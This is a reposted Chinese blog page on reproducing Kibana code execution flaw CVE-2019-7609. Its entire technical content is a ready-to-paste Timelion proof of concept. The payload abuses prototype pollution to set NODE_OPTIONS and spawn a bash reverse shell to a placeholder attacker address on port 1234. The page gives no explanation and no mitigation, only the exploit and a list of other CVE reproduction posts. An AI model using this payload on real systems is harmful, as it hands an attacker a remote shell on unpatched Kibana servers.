Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609 - 码上快乐

相关内容简体繁体

Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609

本文转载自查看原文 2019-10-21 09:56 945 渗透测试

登陆kibana
poc

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1234 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CVE-2019-19781 远程代码执行漏洞复现 CVE-2019-0232 远程代码执行漏洞-复现 PHP远程代码执行漏洞复现（CVE-2019-11043）【漏洞复现】之PHP-FRM远程代码执行漏洞（CVE-2019-11043）复现 Apache Tomcat 远程代码执行漏洞（CVE-2019-0232）漏洞复现 Apache Tomcat 远程代码执行漏洞（CVE-2019-0232）漏洞复现 Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现 CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现 Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725复现 Drupal 远程代码执行漏洞（CVE-2019-6339）简单复现

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM